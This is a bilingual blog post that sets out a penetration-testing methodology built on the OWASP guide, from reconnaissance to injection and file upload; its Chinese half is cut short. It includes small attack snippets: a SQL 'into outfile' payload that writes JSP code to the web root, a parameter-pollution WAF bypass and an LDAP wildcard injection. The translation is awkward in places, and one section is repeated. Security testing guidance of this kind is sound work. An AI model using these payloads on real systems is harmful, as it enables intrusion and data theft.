OWASP penetration test/OWASP渗透测试秘籍

本篇文章采用中文和英文两种语言编写,内容完全相同。如需查看中文版请下滑。

This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down.

Penetration Testing

By accumulating test experience, I gradually establish our own systematic test methodology. This article is very long. It is a methodology that I summarized based on the “OWASP Security Testing Guide” and my nearly a year of penetration testing experience. The article involves few technical details, and more about sharing ideas about industry penetration testing. In my opinion, in addition to the necessary techniques, it is more important for senior penetration tester to have their own test matrix. Different from vulnerability mining and web attacks, I think the focus of penetration testing is to improve testing efficiency, while ensuring high code test coverage, and ensuring the security and independence of various components of the business system. I hope to help colleagues who are new to penetration testing quickly establish their own testing architecture.

Information collecting

The completion of the test depends on the completeness of the information collected. The experience of this sentence is getting deeper and deeper in the constant test. In my opinion, it is not only necessary to collect complete information, but also to have the ability to integrate information to build a system. In the test, all information points related to these functions must be covered.

This is not so necessary when testing the business, after all, you will get an asset report, which includes all the objects that need to be covered. But in the red-blue confrontation or doing hacking challenge, you need to focus on collecting similar code leaks, user names, and sometimes you can search for some important documents, login interfaces, and so on. Use keywords such as’site’,’intext’,’inurl’, etc. to perform a precise search.

Web server fingerprint

Identifying the framework used by the website can narrow the scope of our attack. Some Web middleware may have vulnerabilities that can be directly exploited due to old versions. In addition, obtaining web server information to understand its characteristics can also be helpful in our follow-up penetration process, such as when testing file upload bypassing.

The most direct way to identify the fingerprint of a web server is to look at the’Server’ field in the response header of the data packet. However, most manufacturers will try to hide the banner of the web server for security reasons. At this time, there are several ways to help judge.

  1. The HTTP header fields are sorted. Different Web servers have different sorting of fields.
  2. Request a page that does not exist/error report, and observe the response.
  3. Recognize through scanners, online tools, etc.

Web server metafile

The robots.txt lists the directories that are forbidden to crawl. The test guide only writes information about the existence of the robots.txt file. I think there may be more existences that can be discovered here. If other sensitive files are leaked, there will be consequences. Just as deadly. The problem of packaging and downloading front-end source code has occurred many times, and downloading the code directly for audit is equivalent to not wearing clothes. You can also look for the cookie generation rules in the front-end JS code; there may be hard-coded passwords in the comment content; the internal IP, email, account number and other information written in the code during the application test phase may also exist. These mostly exist in small companies/small productions, and large-scale Web applications generally do not have the above-mentioned problems. In addition, Sitemap, .DS_Store, cross domain.xml and other files will also expose sensitive information.

When doing penetration testing, these tasks are generally handed over to the scanner. For websites that cannot be scanned, you can find some fuzzDict to do special testing.

Enumerate web server applications

Explore all the applications running on the web server as much as possible. Sometimes the same IP address may be mapped to different web applications. Depending on the domain name, it will also be mapped to different web applications. I remember that there is a problem on HackTheBox that is virtual hosting. You need to modify the hosts file and bind another domain name to the ip to access the vulnerable web application.

Under the same IP, it may be parsed into different web applications according to the URL

For this kind of hidden web application, if you don’t have the opportunity to browse the directory, you can only hope that it can be found by crawlers/scanners, or you can find site:www.example.com when you search on Google.

For web servers with open multiple ports, we can use tools such as Nmap to scan all ports to prevent manufacturers from configuring some sensitive entrances to high ports, which are usually difficult to find.

For web servers that use virtual hosts, you can find these hidden web applications by querying DNS records or reverse IP queries. Just use online tools.

Identify application entry

According to the explanation of this section in the test guide, Burp intercepts the request to test the parameters, that is, the parameters passed into the application. According to actual experience, some parameters are framework parameters, which will exist in almost all requests. The names of these parameters may be symbols or various abbreviations. You can test for these frequently occurring parameters first. This will greatly save time for the entire test process, and also clarify the meaning of these parameters, and avoid a situation where a lot of parameters do not know which one to test.

Map the execution path of the application

In the face of a huge web application in the test, it is difficult to achieve full coverage of the code base, and can only try to test more codes. According to the test guide, the methods to improve code test coverage are summarized into three types: path, data flow and competition.

From the perspective of black box testing, all we can see is the path in the URL. When you first get the application, it is best to open an excel sheet or a structured notepad to record a few paths that are prone to problems. Yesterday I discovered an api interface unauthorized issue during testing. It is speculated that it should be a common phenomenon. But because I didn’t record the path at the beginning, it was painful to search again. Another point is that when recording the path/api, be sure to indicate the entry link, otherwise the loopholes will be found at the end, and you will completely forget where you came from.

Identify web application framework

Just like identifying a web server, knowing that the application framework can start with a library of known vulnerabilities, go through it first. Because of the special business, some places cannot be repaired according to the repair suggestions provided by the manufacturer according to the framework. It is all repaired by the web application manufacturer. It is inevitable that there will be some omissions. If you feel something is wrong during the test, you can try to bypass it.

As for identifying web application frameworks, one is based on your own experience. For example, if you are an experienced tester, you have tested many frameworks, and you can tell through a page or an error message. Sometimes manufacturers deliberately hide the characteristics of the framework. In this case, some online tools can be used for identification.

tool

  • netcraft. Online tool to identify the basic information of the web server and the page. What’s that site running?

  • Nmap. Scan the port to check the service and version, and look at the parameters in the manual when you use it.

  • BurpSuite. There is nothing to say, 2.0 linkage between sqlmap and Xray is very easy to use.

  • WhatWeb. Identify web applications. WhatWeb-Next generation web scanner.

  • BlindElephant. The principle is to identify different versions of static files based on different check values, so the accuracy is very high. BlindElephant

Configuration management test

For penetration attacks, when mining SRC, configuration testing may be rarely involved. But at work, the security of the configuration must be verified before the business goes online. Here is more to test whether the configuration of the product to be launched is safe or not from the perspective of the manufacturer. A very important security idea is involved in this, that is, security cannot be relied upon. For example, my web application has SQL injection vulnerabilities, but the front end has waf protection. The attacker does not seem to be able to cause harm to the web application. But in fact, this is unsafe. Just like a series circuit, a light bulb with one circuit broken can not light up. The same idea is migrated from the Web application level to the Web server/network configuration level. You cannot rely solely on Web application security to ensure the security of the server, and the server itself must be configured correctly to ensure maximum security.

Network and Infrastructure

First identify all components and ensure that these components do not have known vulnerabilities, and the systems used to manage these components cannot have vulnerabilities. Strictly control access to these components and maintain a list of ports required by an application.

It is difficult to test the server, and some automated tools or scripts are generally used. Be cautious when using tools, which may cause server downtime/denial of service. The same situation also exists in web testing. Automated tools have false positives when testing the Web server. The false negatives are because some administrators delete or confuse the version information in order to hide the server information, but the tool cannot correctly detect the server component version. The false alarm is because the administrator fixes the known vulnerabilities with patches, but does not update the version of the web server.

As a tester, when testing the host, he usually uses a scanner to scan. The reports are mostly weak cipher suites, support for low version protocols, etc. It is difficult to detect false negative vulnerabilities. Here again, the idea that security cannot be relied upon is used. Developers/operations and maintenance personnel should abide by the security development rules for server configuration, and operation and maintenance personnel should repair newly announced vulnerabilities in a timely manner, and cannot rely solely on penetration testing to find vulnerabilities.

Application platform configuration

Web applications may have demo and test pages left. Or some configurations set up for convenience in the test environment, including but not limited to simultaneous login with the same account, universal password/verification code.

Black box testers do not have configuration guides, so they will be a little blind to test. According to the summary on the OWASP test guide, I combined my own test and summarized it

  • Send several malformed parameters like negative values, characters, etc., to check whether the Debug mode is closed.

  • Continue to send malformed parameters, request a file that does not exist, and see that the returned page does not contain error information.

  • Look at the log, and check whether all additions, deletions, and changes are in the log, and whether the principle of separation of three members (admin, audit, user) is complied with.

  • Middleware configuration files, website configuration files cannot be accessed

  • View all kinds of weird functions in the admin panel.

Log

The importance of log files is self-evident. The recording, management, and storage of logs in web applications must be tested.

First of all, it should be avoided that log files cannot reveal sensitive information. Related to it is the encryption of information. Whether the encryption algorithm is reliable or not must be considered here and retrogradely.

Is the log only accessible to log auditors? Is the log undeletable? Who will audit the records of the audit log? There are many thoughts about the separation of three members.

Is the log stored on the log server, is the maximum storage limit set for the log, and what to do when the maximum storage limit is reached?

Sensitive Documents

The incomplete cleaning of sensitive files when the application is launched after the development is completed, and the incomplete cleaning of sensitive files after the update will cause the leakage of sensitive files. It may be the server configuration file, or the source code may be leaked. When testing, one is based on experience, the other is scanning by the scanner, and the third is occasionally found in the comments (but now the scanner will also scan the comments for sensitive content by the way), and there is Google hacking. Sometimes, although the sensitive files are deleted, the location of the sensitive files will remain in the Google hacking database because of the previous existence, so that similar files can be inferred.

HTTP method test

Other methods of HTTP may cause security issues for web applications

  • The PUT method allows attackers to upload files to the server, the most classic IIS PUT vulnerability.
  • The DELETE method allows an attacker to delete files on the server.
  • CONNECT allows an attacker to use a web server as a proxy.
  • TRACE was initially considered harmless, but was later found to be used for cross-site tracking (CST).

When testing, use OPTIONS requests to check which requests are supported, or try them one by one. Note that some frameworks allow the use of the HEAD method instead of GET, which will cause the role-based access control to override the authority. In addition, the two methods of GET and POST should be tested for the override of authority.

At present, most manufacturers require mandatory HTTPS, test whether HTTP can be used.

Identity Management Test

The identity management mentioned here does not specifically refer to rights management, but refers to some management-related tests involved in the user registration process.

register

The well-known network application registration functions can be roughly divided into several types

  • Backstage registration, registration interface is not open
  • Invitation code registration, such as Hack The Box
  • Mobile number/email registration
  • Account password registration

For penetration testing, the first type of background registration is not within the scope of our testing, or not within the scope of testing discussed in this section. The weak passwords involved in this kind of registration, test password residues, etc. can be placed in the subsequent authentication test.

In invitation code registration, the main problem lies in the security of the invitation code. Can it be guessed? Can it be reused? What is the process of obtaining the verification code? Needless to say, if the verification code contains the permissions that the registered user should have, if the invitation code only verifies that the user has the registration qualifications, and does not determine the user permissions, security should be discussed with the following two.

Mobile phone number, email, and even social platform registration is the most popular way to register today. Compared with the previous two, this kind of registration is open to anyone. When doing the test, it mainly focuses on the following aspects

  • Can the same user/identity register multiple times
  • Can register users with multiple permissions
  • Whether the entered email address/mobile phone has been verified

Regarding the last account password test, it is actually similar to the third one, except that the account is divided into system issuing and user input. Accounts issued by the system must pay attention to the randomness and unpredictability of the account (depending on the situation or not), and the user’s input is to verify the repetition and conformity to the unified format.

Account enumeration

Usually, when testing, there are horizontal unauthorized loopholes, and we will collect other users’ identity authenticators, similar to UID and other information. For Web applications, this sensitive parameter used to authenticate users must in principle ensure that it is difficult to enumerate. For example, the user id of WeChat is very complicated and difficult to be enumerated. Those who are interested can check it out.

As a tester, you can use the following methods to try to collect user IDs

  • Web application response. When sending an HTTP request, change the uid to observe whether the response is consistent, or whether it will prompt the user that it does not exist. The response range can also be error, 404/403/200, etc.
  • Collected in URI. Some web applications use the routing function, which can be seen from the URI. At this time, you can find places similar to friends list, follow/fan list, comment area, etc. where other users appear for collection
  • Rule speculation. Registering multiple users to guess the principle of username generation usually involves the intervention of time stamps and registration information.

Authentication test

Authentication refers to confirming or confirming that the behavior of a person or business is true and credible. In network security, authentication is the process of attempting to verify the digital identity of the communication initiator. For example, login is the simplest verification process. Relative to security personnel, testing and verification means understanding the verification mode, testing whether vulnerabilities or strategies can be used to bypass authentication.

Transmission test

Today, all web application products launched by large-scale manufacturers should be mandatory to support HTTPS. In the black box test, we mainly focus on the process of data transmission, such as when the user name and password are entered on the login page, is it forced to use the HTTPS protocol to send through the POST request.

The first must be an HTTPS request, in order to prevent MITM attacks that are often seen in textbooks, that is, man-in-the-middle attacks. Nobody wants everyone to be in the coffee shop and be spoofed by a hacker at the next table, and then you visit an HTTP website, and all the access records run naked on the hacker’s computer. This precaution is really not to be underestimated, because no one will write the gateway to a specific address after going out of home or work, and arp cheating is always impossible to prevent.

Second, why use POST requests instead of GET requests. Although HTTPS is at the fifth layer of the seven-layer protocol, the data in the GET request is also encrypted and protected, but the URL records in the GET request are often stored in log files, Access records are generally stored in plain text, which increases the risk of sensitive information being leaked.

The last thing is to verify that the referer is also an HTTPS web page, otherwise there will be an SSL-Strip attack.

Account password test

The first is the password strength test. If the general web application has a registration function, it will require the use of more than 8 numbers + letters + one uppercase + special characters. For black box testing, you can take a look at the password rules at the place where the account password is created to test.

Then there is the weak password test. Generally, in the development phase, developers will log in with a set of passwords that are easy to enter. At the same time, some web applications require a verification code when logging in, and developers will also leave a set of universal verification codes for convenience. The purpose of our test is to find these possible weak passwords. In addition, does the new user created by the administrator use the default password? Is it mandatory to change the password when logging in for the first time?

Another perspective is lock, such as how long to lock the account when the password is entered more than once incorrectly. The specific strategy should be related to the sensitivity of the web application, but there should be no doubt that this mechanism should exist to prevent the password from being brute force.

Authentication bypass

Here we only discuss the bypassing of some authentication functions, and issues such as Broken Access Control are not discussed here. The most common way to bypass the login box is SQL universal password injection. In addition, in ancient times, there were some web pages that did not do login verification. It should be the display page after login. As a result, you can directly access it by entering the URL in the browser. Now there are still some methods to identify the login status through parameters, similar to “authorized”, etc., and some developers are smart enough to change the names of these paragraphs or write them in the Cookie. It feels difficult to be discovered. In fact, when you touch it Just broken.

Authorization test

This authorization test is not to say that your test is authorized, but to test the authorization itself. In fact, I think it is better to call “What you can do”test, but it is written in the OWASP guide, so I just copied it.

Directory traversal/file inclusion

To find such test points during black box testing, the main concern is

  • Whether there are request parameters for file operations
  • Whether there is an abnormal file extension
  • Is there an interesting variable name
  • Can it be determined that the web application dynamically generates page content through cookies

What we see a lot is that we find directory traversal or the final RCE need file inclusion in the CTF topic, but in the test, these are easy to use, and it is difficult to go to the public network to repair simple vulnerabilities. Therefore, we are paying attention to the URL at the same time, Also pay attention to some API interfaces. Nowadays, front-end and back-end interactions often use json, xml, etc. The parameters in these data may also be file identifiers. Sometimes paying more attention to these places will bring unexpected gains. It’s a bit like the last cookie content to dynamically generate a webpage, essentially the file identifier is written in the cookie.

Of course, there are some skills when testing. You need to be familiar with the Web environment and construct different test payloads for different servers/middleware. There is another interesting loophole here, called relative path coverage. Tianshi classmate wrote an article to explain it very clearly.

Exploration of RPO attack methods-FreeBuf network security industry portal

The WeChat applet tested a few days ago, after uploading the picture, the picture was stored in a special file server, and the picture storage address was included in the return package. Follow up to see that there is a directory traversal. I feel that directory traversal is to be more careful, there is no technology at all, you can always find it if you look carefully.

Authorization bypass

Can I still use the function after the account is registered and then logged out? Support simultaneous online accounts. Can the function be used when one PC is offline and the other is offline? Are you redirected if you are denied access to a high-privilege page? Does the front end leak information? Is the API unauthorized to use?

For the last API problem, there are actually a lot of problems, which requires a good development. I tested a system two weeks ago. During the initial test, I reported an API unauthorized issue. After the retest, I found that the feedback API was repaired, and other APIs were still unauthorized. If such problems are found, it is best to conduct API audits together with the development, and use a set of authentication logic in a unified manner.

There are many ways to bypass the permission judgment logic. The most basic replacement id, parameters, etc., can also replace the HTTP method from POST to GET.

There are also some logical problems, such as changing the password page/registration page atmosphere Pages 1 to 5, but you can directly enter page4 in the address bar to jump without going through page3.

Permission escalation

According to the law of ternary separation, a set of business system atmosphere administrators, auditors and users can also count unlogged users as a role. When testing, distinguish all roles according to different business systems and sort out the functions they can use. For example, all companies will have a customer service hotline. This kind of customer service call is not the kind that is answered with a mobile phone, but is connected to a set of customer service telephone system and assigned to all salesmen to answer. Can you imagine what kind of role this business system will have? First of all, the administrator and log auditor in the ternary discrete model must exist, and the role of the user is split in this scenario. The first is the front desk operator. They should not have the authority to view the user’s personal data and the information of the user’s consulting equipment. They are only responsible for listening to the user’s needs and transferring the user to the corresponding operator. The front desk operator should be able to view the access numbers and information of all salesmen. After receiving a call from a customer, a specific salesperson should be able to view customer information and information about the business equipment that his department is responsible for, but cannot view other departments.

To give another example, how many roles should a set of SRC system have? First of all, it is the principle of ternary separation, in which users can be divided into two types: enterprises and white hats. White hats can submit vulnerabilities to the corresponding companies, but can only view the vulnerabilities submitted by themselves. You can view some of the information of other white hats. ; Companies can view all their own related vulnerabilities, but not friends. In addition, there are users who are not logged in. They cannot view the information of the white hat, but can browse part of the content and so on.

And so on, the core idea is to clarify the role and function characteristics of each system, and then test.

In the test process, it is necessary to pay attention to the fact that it is not invisible and there is no unauthorized access. You may be able to access it by directly entering a URL that can only be viewed by high-privileged users. Some operations of high-privileged users on high-privileged pages, such as refreshing, editing, and liking, may cause information leakage due to unauthorized access, so be careful.

Session management test

The core component of any Opportunity Web application is a mechanism used to control and maintain the state of interaction between website users and its users. This mechanism is called session management, which is, intuitively speaking, Cookie and Session. In the penetration test, if the cookie can be obtained, it is equivalent to the account. However, the current high-security system will avoid this situation. The replacement of the cookie can be attributed to a vulnerability called cookie unauthorized access. However, in the vast majority of small and medium-sized public network systems, there is a widespread replacement of Cookie login, so the security of Cookie is very important.

Session framework bypass

Some information such as user id, permission identification, token, etc. will be stored in the cookie, but it is usually encrypted by algorithm. First of all, you can find if there is any leakage of the cookie generation logic from the front-end JS code, and you can find it after a scan. If not, you can try to collect a large number of cookies to find a certain pattern for brute force cracking attacks, but this method is extremely not recommended, and the efficiency is too low. I think it is completely unnecessary in the daily heavy penetration test.

There is another way of thinking. Although all transmitted data packets carry cookies, the verification of cookies is very strange in some places, and deleting cookies may also lead to bypassing.

The Cookie in the data packet is mandatory for encrypted transmission. If it is not encrypted, the security is almost zero. The special case is that there is a random user id with more than 8 digits in the cookie, and the background authenticates the authority according to the id.

Chrome has a plug-in called Edit This Cookiehttps://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=en-US to view the properties in the cookie. Taking CSDN as an example, the value of each Key corresponding to the Cookie can be modified above, and the following can check whether several key attributes in the Cookie have been set. The cookie here is not logged in.

The Secure attribute means that high-speed browsers only add cookies when the request is sent through the secure channel of HTTPS, which can prevent cookies from being transmitted in plain text; the HttpOnly attribute can prevent XSS from obtaining cookies, and the client is not allowed to manipulate cookies through scripting languages such as Js; the Domain attribute should Set as the server that needs to accept the changed cookie. Note that it should be specified to a certain server, not the entire 2nd and 3rd level domain names. The Expries attribute manages the cookie expiration time, and this value should be set to a reasonable range.

Session curing test

When the application does not update the session cookie after the user is successfully authenticated, the attacker may find a fixed loophole home, forcing the user to log in using the cookie known to the attacker. In this way, the cookie does not change when the login is successful, and the user’s cookie is naturally leaked. During the test, pay attention to observe whether the Cookie changes before and after the successful login.

CSRF

CSRF vulnerabilities are also caused by improper session management. I won’t introduce the principle of CSRF here. If you don’t know, you can check it yourself. In the actual mining process, we should focus on whether there is CSRF at the core function. For example, change password, reset password, transfer, purchase, delete, add, etc. This is a very cumbersome process. You can’t just judge whether there is a Refer field in the data packet, because some applications are developed by teams, and different programmers are responsible for different functional modules, and the level of security development of programmers is not the same. Some programmers will not check the Refer field transmitted in the data packet.

Here I share my experience. During the penetration test, every time I start testing a new function/module, I will try SQL injection/XSS. Some programmers with a relatively high level of security development will perform SQL statement parameterized queries, and XSS front-end escape defense methods. For a module developed by a programmer with a high level of security, I will verify whether one or two CSRF vulnerabilities exist. If the Refer is verified, then I will think that there is no CSRF in this module. For modules where there are SQL injection filtering keywords, XSS blacklist filtering, etc., which are not very secure defense methods, I will try my best to test every point with CSRF vulnerabilities. Although this experience cannot help improve the accuracy of CSRF detection, it can greatly improve the efficiency of the entire penetration testing process.

CSRF exists in every GET/POST request, and JSON format data can also have CSRF. Here is another article I wrote [CSRF Attack in JSON Context](https://ama666.cn/2021/02/08 /JSON%E6%83%85%E6%99%AF%E4%B8%8B%E7%9A%84CSRF%E6%94%BB%E5%87%BB/#more). Use BurpSuite integrated CSRF POC Generator to quickly generate test POC.

Session curing test

When the application does not update the session cookie after the user is successfully authenticated, the attacker may find a fixed loophole home, forcing the user to log in using the cookie known to the attacker. In this way, the cookie does not change when the login is successful, and the user’s cookie is naturally leaked. During the test, pay attention to observe whether the Cookie changes before and after the successful login.

CSRF

CSRF vulnerabilities are also caused by improper session management. I won’t introduce the principle of CSRF here. If you don’t know, you can check it yourself. In the actual mining process, we should focus on whether there is CSRF at the core function. For example, change password, reset password, transfer, purchase, delete, add, etc. This is a very cumbersome process. You can’t just judge whether there is a Refer field in the data packet, because some applications are developed by teams, and different programmers are responsible for different functional modules, and the level of security development of programmers is not the same. Some programmers will not check the Refer field transmitted in the data packet.

Here I share my experience. During the penetration test, every time I start testing a new function/module, I will try SQL injection/XSS. Some programmers with a relatively high level of security development will perform SQL statement parameterized queries, and XSS front-end escape defense methods. For a module developed by a programmer with a high level of security, I will verify whether one or two CSRF vulnerabilities exist. If the Refer is verified, then I will think that there is no CSRF in this module. For modules where there are SQL injection filtering keywords, XSS blacklist filtering, etc., which are not very secure defense methods, I will try my best to test every point with CSRF vulnerabilities. Although this experience cannot help improve the accuracy of CSRF detection, it can greatly improve the efficiency of the entire penetration testing process.

CSRF exists in every GET/POST request, and JSON format data can also have CSRF. Here is another article I wrote [CSRF Attack in JSON Context](https://ama666.cn/2021/02/08 /JSON%E6%83%85%E6%99%AF%E4%B8%8B%E7%9A%84CSRF%E6%94%BB%E5%87%BB/#more). Use BurpSuite integrated CSRF POC Generator to quickly generate test POC.

Input verification test

The first sentence I heard during the process of learning penetration testing was “All input is unsafe”. This sentence is very classic, and it is our mindset during the penetration process. SQL injection, XSS, file upload, RCE, etc. are all derived from user input. This section mainly summarizes how to quickly and accurately find vulnerabilities in the face of various input-receiving functions.

XSS

XSS is probably the most commonly seen vulnerability in penetration testing, and there is nothing unusual in terms of testing methods. If the front end is escaped, you don’t need to watch it. If you filter it, just fuzz it. I think the more important thing about XSS in testing is that it must have a wide coverage, and try XSS wherever you have the opportunity to write HTML. Not only the comment area, such as the name of the uploaded image/file, but also various unexpected places. One of the most peculiar XSS I have seen is a scheduling bulletin board, where the editing data packet is sent on the editing bulletin page, and there is a key called class, which probably means classification. I tried to add XSS in the value corresponding to this key. After sending, there is no XSS display on this page, and I didn’t even find where the echo is. When I stepped back to the page where I browsed all the bulletin titles, I started XSS. F12 looked at the source code and found that the value of the class was inserted into the HTML code on this page.

For more automated XSS testing, it is recommended to use Xray linkage. The passive scanner developed by P Niu is really easy to use. The disadvantage is that hundreds of XSS will be inserted. It may be a little troublesome to test the function later.

HTTP method tampering

All HTTP request methods in HTTP1.1, except for the first one, are prohibited as far as possible.

-GET, POST normal business support methods
-OPTIONS query supported HTTP methods, execution in different directories may have different effects
-PUT can use this request to upload files to the server
-DELETE can delete files
-TRACE can traverse firewalls and proxies, loopback diagnosis
-The CONNECT CONNECT method is reserved for the HTTP/1.1 protocol, which can change the connection to a proxy server in a pipe mode. Usually used for communication between SSL encrypted server link and non-encrypted HTTP proxy server.

In most cases, HTTP dangerous methods can be found directly by the scanner, and the coverage of the scanner is definitely wider than that of people. When some business systems need to log in to access certain paths and the scanner does not support login scanning, it is necessary to stop work and test the accessible directories after login.

HTTP parameter pollution

Using the same name for multiple HTTP parameters may cause the application to behave in an unpredictable manner. This vulnerability once affected the core rule base of ModSecurity SQL injection. The ModSecurity filter can filter the string select 1,2,3 from table normally, so when the string appears in the URL for a GET request to query the database, it will be filtered. But the attacker can make the ModSecurity filter accept multiple inputs with the same name, and can construct such a URL http://domain/?query=select 1&query=2,3 from table will not start the filter, but it can be composed at the application layer The complete SQL query statement.

Here is how different languages/middleware handle the same-named parameters, some are separated by special symbols such as commas, some only take the first one, and some only take the last one.

SQL injection

I believe everyone is familiar with SQL injection. This should be the first vulnerability in learning security, and one of the most frequently discussed vulnerabilities. Early risers are more rampant. With the improvement of security awareness, the number of SQL injection vulnerabilities is declining, but Still exist. The principle will not be elaborated, and the specific testing and bypassing techniques will not be discussed in detail. What can be found on the Internet is enough. This section only talks about finding the experience of SQL injection and methods to improve efficiency.

To get a business system, you must first be familiar with the contracting parameters of this business system. Just as the code audit looks at the installation files and routing first, although the black box test cannot see the code, it can see some parameters that exist in almost every data packet, or most of the data packets. Try SQL injection for these parameters first, so that you can skip the same parameters later. Secondly, try to find some very unobvious parameter points that interact with the database, and don’t miss every data packet.

It is recommended to use the BurpSuite plug-in to link SQLmap, and it is very efficient to send the data packet directly to SQLmap and run it again. The name of the plug-in is ``.

The other is that secondary injection is a point that is easily overlooked, and it must be analyzed in combination with specific business systems.

If there are SQL injection vulnerabilities, and the user has permission to write files and single quotes are not transcoded, you can use select * from table into outfile'/tmp/file' to write files. This attack can be used as an additional technique to obtain one Query result information or write to file, you can execute in the directory of the web server 1 limit 1 into outfile `/var/www/root/test.jsp’ FIELDS ENCLOSED BY `//‘ LINES TERMINATED BY `\ \n<%jsp code here&>’;, in this way, a file is created with the permissions of the MySQL user, which contains the following content

1
2
//fiedl value//
<%jsp code here%>

load_file is a function used to read a local file. If the user has file read permission, this function can be used to read the file.

For single quotation marks, MySQL finally has a standard way to bypass single quotation marks and add password like'A%' to get the value of the Password field. You can use ASCII password like 0x4125 or password like char(65, 37).

LDAP test

I have reproduced an LDAP injection vulnerability CVE-2017-14596 a long time ago. At that time, it was to complete the task of the Red Sun Security Code Audit Team, so I did not post it on the blog. It is a pity that the original manuscript is no longer available. arrive. LDAP is a light directory access protocol, and the authentication method in the Windows domain is a type of LDAP. LDAP query has its own unique set of syntax. If you are new to penetration testing, you may not know it well. I will briefly introduce it here.

Many abbreviations are used in the LDAP protocol

  • dn (Distinguish Name) a record of a location, compared to SQL, it is a query statement, which represents a location in LDAP
  • dc(Domain Component) The zone to which a record belongs, the domain name part
  • ou (Organization Unit) The organization to which a record belongs
  • cn(Common Name) username or server name

Suppose a web application uses a search filter

1
searchfilter="(cn=" + user +")"

From the perspective of URL, the parameter transfer is like this

1
http://domain.com/ldapsearchfilter?user=

If we do not enter the user name after user, but use a * instead, it will become in the query code

1
searchfilter="(cn=*)"

This becomes a wildcard, the attributes of all users in Huixian City, or some users, and it is necessary to sterilize the execution flow of the application.

There are only two LDAP injections that I have tested, both of which were discovered during user authentication. Use (, \, |, &, * and other characters to test out LDAP injections. I personally recommend using them. Burpsuite’s Intruder function, add LDAP injection test conceit in front of SQL injection, and the result can be measured by fuzzing.

XXE

XXE itself requires the server to parse the XML file. During the test, it is often seen that the Accept-Content field in the return package contains XML, but it is not parsed as long as it contains XML. This needs to be tested manually. Sometimes XXE is often found in the file upload location.

When testing XXE, it is best to find a server under the same network segment as the server that accepts out-of-band data. Because most of the XXE are not echoed, you need to view the Web log to obtain out-of-band data information. The development network is isolated from the external network, and out-of-band data cannot be accessed using the external network VPS.

Code injection

Some web function pages allow users to enter code on the web page and trigger the web server to execute the code. In code injection testing, the tester submits inputs, and then the web server accepts these inputs as dynamic codes or include files. The code injection referred to here includes the often-said command injection, which is often found in the web background. Not only web applications, but also code injection features frequently appear on the back-end management pages of some host devices. Unlike the Web, the host device is more about command injection into the terminal Shell, because the host device is often not equipped with a database, but uses the command line for identity authentication or code execution.

The code execution on the web application is more about finding the points where the command may be executed with a keen sense of smell. Here I divide web applications into two major categories. The first category is a large open source CMS, similar to ThinkPHP, WordPress, Laravel, and so on. Most open source CMSs of this type have experienced code audits and vulnerability mining by countless security experts. It is difficult to dig into code injection problems if they are not well-founded. If you encounter this type of secondary open source CMS in your work, you need to focus on the new features that are different from the native CMS, and whether it is appropriate to call the native filter function. From a black box perspective, you need to test the new ones that are different from the original CMS. Function page. The second category is self-developed web applications. The possibility of code injection in these applications is far greater than the first category. The back-end functional code is inferred from the front-end black box point of view, and the points where there may be code injection are found for testing. You need to look for this kind of testing, because you don’t know how peculiar (non-derogatory) the idea of development is.

I think the most efficient way to test code injection is to perform Fuzz testing together with SQL injection and LDAP injection, adding some commands such as sleep, I have to say that Fuzz testing can always bring surprises.

Buffer area out

Strictly speaking, buffer overflows are also counted as injection vulnerabilities, but I think it is difficult to detect buffer overflows by manual testing. Maybe it is my lack of ability to have this idea. In modern SDLC, black-box testing was preceded by white-box code audit, and the buffer area should be stifled in the process of code audit. In the black box test, the buffer overflow vulnerability can also be found through the scanner, and the same is true for DOS.

File Upload

File upload vulnerabilities are very easy to find from the point of view of finding, because the upload function will never appear in a few fixed locations, such as avatar upload, personal data upload, data table upload and so on. But based on my experience, I think the definition of file upload should be broader. Some logs can be written, so if the log file path is exposed, there will be a risk of exploitation. There are also some project management types of applications that can also create work orders. If the work order is stored as a separate file, it can also be classified as a file upload. Some languages, such as CSS, do not require a complete file to conform to the CSS syntax, but only a part of it.

《渗透测试》

通过积累测试经验,逐渐建立自己的成体系化的测试方法论。目标是随着经验的累积,从一开始对照着checklist逐步排查,到心中有清晰的测试脉络,到最后纵心所欲不逾矩。

本文很长,是我根据《OWASP安全测试指南》和从将近一年的渗透测试经历中整理的方法论。文中涉及的技术干货比较少,更多的是对于企业/安服渗透测试的思路层面的分享。我认为高级渗透测试工程师除了必备的技术以外,更重要的是面对系统能有自己的成体系的测试矩阵。与漏洞挖掘,Web攻击不同的是,我认为渗透测试工作讲究的是在高代码测试覆盖的同时提升测试效率,确保业务系统的各个组件的安全独立性。希望能够帮助还在处于渗透测试新人的同行们快速建立自己的测试体系架构。

信息收集

一次测试的完成度取决于信息收集的完整度,在不断的测试中对这句话的体验越来越深。在我现在看来不仅仅要将信息收集完整,还要有将信息整合建立体系的能力,类似于星状图,测试中要将和该功能相关的所有信息点全部覆盖。

谷歌搜索

这个在测试业务的时候倒没那么需要,毕竟会拿到一份资产报告,里面囊括的需要涵盖的所有对象。但是在红蓝对抗或者打靶场的时候,就需要着重搜集类似于代码泄露,用户名,有时候还能搜索到一些重要文档,登录接口等等。使用’site’、’intext’、’inurl’等等关键字进行准对搜索。

Web服务器指纹

识别网站使用的框架可以缩小我们的攻击范围。一些Web中间件可能由于版本老旧,存在漏洞可以直接利用。另外获取Web服务器信息,从而了解其特点也可以在我们的后续渗透过程中提供帮助,比如测试文件上传绕过的时候。

识别Web服务器指纹最直接的方式就是看数据包响应头中的’Server’字段,但是绝大多数的厂商为了安全考虑都会想方设法隐藏Web服务器的banner,此时有几种方法来帮助进行判断。

  1. HTTP报头字段排序,不同的Web服务器对字段的排序不同。
  2. 请求不存在的/报错的页面,观察响应。
  3. 通过扫描器,在线工具等进行识别。

Web服务器元文件

robots.txt中罗列了禁止爬虫爬取的目录,测试指南上只写了关于robots.txt文件的存在的信息,我认为这里还可能有更多可以挖掘的存在,其他的敏感文件如果泄露后果也一样致命。前端源代码打包下载这个问题发生过不少次,直接把代码下载下来审计相当于不穿衣服。在前端的JS代码中也可以寻找Cookie的生成规则;注释内容中可能存在硬编码口令;应用测试阶段写在代码的内部IP、邮箱、账号等等信息也可能存在。这些多存在于小公司/小制作,大型的Web应用一般不存在上述这类问题。另外Sitemap、.DS_Store、cross domain.xml等等文件也会暴露敏感信息。

在做渗透测试的时候这些工作一般都是交给扫描器的,对于不能扫描的网站可以找一些fuzzDict来做专项的测试。

枚举Web服务器应用

